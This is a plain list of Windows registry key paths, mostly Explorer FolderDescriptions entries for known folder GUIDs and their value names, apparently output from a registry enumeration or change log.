HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4BD8D571-6D19-48D3-BE97-422220080E43}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\PreCreate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ad88c9c4-5f87-11ed-b63d-806e6f6e6963}\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0762D272-C50A-4BB0-A382-697DCD729B80}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0762D272-C50A-4BB0-A382-697DCD729B80}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4D9F7874-4E0C-4904-967B-40B0D20C3E4B}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{4D9F7874-4E0C-4904-967B-40B0D20C3E4B}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0AC0837C-BBF8-452A-850D-79D08E667CA7}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0AC0837C-BBF8-452A-850D-79D08E667CA7}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D0384E7D-BAC3-4797-8F14-CBA229B392B5}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D0384E7D-BAC3-4797-8F14-CBA229B392B5}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B0DB17D-9CD2-4A93-9733-46CC89022E7C}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B0DB17D-9CD2-4A93-9733-46CC89022E7C}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B6EBFB86-6907-413C-9AF7-4FC2ABF07CC5}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B6EBFB86-6907-413C-9AF7-4FC2ABF07CC5}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{69D2CF90-FC33-4FB7-9A0C-EBB0F0FCB43C}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{69D2CF90-FC33-4FB7-9A0C-EBB0F0FCB43C}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{374DE290-123F-4565-9164-39C4925E467B}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{374DE290-123F-4565-9164-39C4925E467B}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{859EAD94-2E85-48AD-A71A-0969CB56A6CD}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{859EAD94-2E85-48AD-A71A-0969CB56A6CD}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A305CE99-F527-492B-8B1A-7E76FA98D6E4}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A305CE99-F527-492B-8B1A-7E76FA98D6E4}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3D644C9B-1FB8-4F30-9B45-F670235F79C0}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3D644C9B-1FB8-4F30-9B45-F670235F79C0}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A990AE9F-A03B-4E80-94BC-9912D7504104}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A990AE9F-A03B-4E80-94BC-9912D7504104}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DFDF76A2-C82A-4D63-906A-5644AC457385}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DFDF76A2-C82A-4D63-906A-5644AC457385}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1A6FDBA2-F42D-4358-A798-B74D745926C5}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1A6FDBA2-F42D-4358-A798-B74D745926C5}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A520A1A4-1780-4FF6-BD18-167343C5AF16}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A520A1A4-1780-4FF6-BD18-167343C5AF16}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B88F4DAA-E7BD-49A9-B74D-02885A5DC765}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B88F4DAA-E7BD-49A9-B74D-02885A5DC765}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2C36C0AA-5812-4B87-BFD0-4CD0DFB19B39}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2C36C0AA-5812-4B87-BFD0-4CD0DFB19B39}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DF7266AC-9274-4867-8D55-3BD661DE872D}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DF7266AC-9274-4867-8D55-3BD661DE872D}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{ED4824AF-DCE4-45A8-81E2-FC7965083634}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{ED4824AF-DCE4-45A8-81E2-FC7965083634}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{15CA69B3-30EE-49C1-ACE1-6B5EC372AFB5}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{15CA69B3-30EE-49C1-ACE1-6B5EC372AFB5}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3214FAB5-9757-4298-BB61-92A9DEAA44FF}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3214FAB5-9757-4298-BB61-92A9DEAA44FF}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{905E63B6-C1BF-494E-B29C-65B732D3D21A}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{905E63B6-C1BF-494E-B29C-65B732D3D21A}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D20BEEC4-5CA8-4905-AE3B-BF251EA09B53}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D20BEEC4-5CA8-4905-AE3B-BF251EA09B53}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE92C1C7-837F-4F69-A3BB-86E631204A23}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DE92C1C7-837F-4F69-A3BB-86E631204A23}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{10C07CD0-EF91-4567-B850-448B77CB37F9}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{10C07CD0-EF91-4567-B850-448B77CB37F9}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C1BAE2D0-10DF-4334-BEDD-7AA20B227A9D}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C1BAE2D0-10DF-4334-BEDD-7AA20B227A9D}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{190337D1-B8CA-4121-A639-6D472D16972A}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{190337D1-B8CA-4121-A639-6D472D16972A}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{54EED2E0-E7CA-4FDB-9148-0F4247291CFA}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{54EED2E0-E7CA-4FDB-9148-0F4247291CFA}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BFB9D5E0-C6A9-404C-B2B2-AE6DB6AF4968}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BFB9D5E0-C6A9-404C-B2B2-AE6DB6AF4968}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5CD7AEE2-2219-4A67-B85D-6C9CE15660CB}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5CD7AEE2-2219-4A67-B85D-6C9CE15660CB}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B94237E7-57AC-4347-9151-B08C6C32D1F7}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B94237E7-57AC-4347-9151-B08C6C32D1F7}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5CE4A5E9-E4EB-479D-B89F-130C02886155}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5CE4A5E9-E4EB-479D-B89F-130C02886155}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A74AEB-AEB4-465C-A014-D097EE346D63}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A74AEB-AEB4-465C-A014-D097EE346D63}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}
